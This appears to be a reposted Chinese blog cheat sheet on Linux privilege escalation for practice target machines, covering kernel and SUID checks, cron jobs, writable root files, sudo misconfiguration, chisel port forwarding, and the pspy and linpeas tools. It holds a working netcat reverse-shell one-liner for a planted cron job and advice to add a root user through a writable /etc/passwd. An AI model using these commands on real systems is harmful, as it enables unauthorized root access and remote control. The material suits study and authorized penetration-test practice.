“ 提权总结”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
提权思路
1.内核提权:查看系统内核版本后,根据版本号查找CVE提取
常用命令:
cat /etc/issue
cat /etc/os-release
uname -a
2.SUID提取
常用命令和网站:
find / -perm -u=s -type f 2>/dev/null
https://gtfobins.github.io/
3.计划任务提权
写入计划任务的反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f"
常用工具:
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
4.查找ROOT权限文件并且其他用户有写入的权限:
find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"
比如/etc/passwd有权限写入,可以直接写入一个root用户进行提权
5.sudo错误配置提权
常用命令:sudo -l
6.注意靶机只对本地开放的端口,比如127.0.0.1:8000或者127.0.0.1:8080
这个时候需要我们去把靶机本地的端口转发到kali上面:
可以使用chisel工具进行转发:
kali上
./chisel_kali server -p 8000 --reverse
靶机上:
./chisel client 192.168.32.173:8000 R:8001:127.0.0.1:8000
#这是将靶机的8000端口转发到kali的8001端口,这样直接访问kali的8001就可以了
7.常用自动化工具
linpeas提权脚本:
https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
原文始发于微信公众号(道玄网安驿站):Linux提权套路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论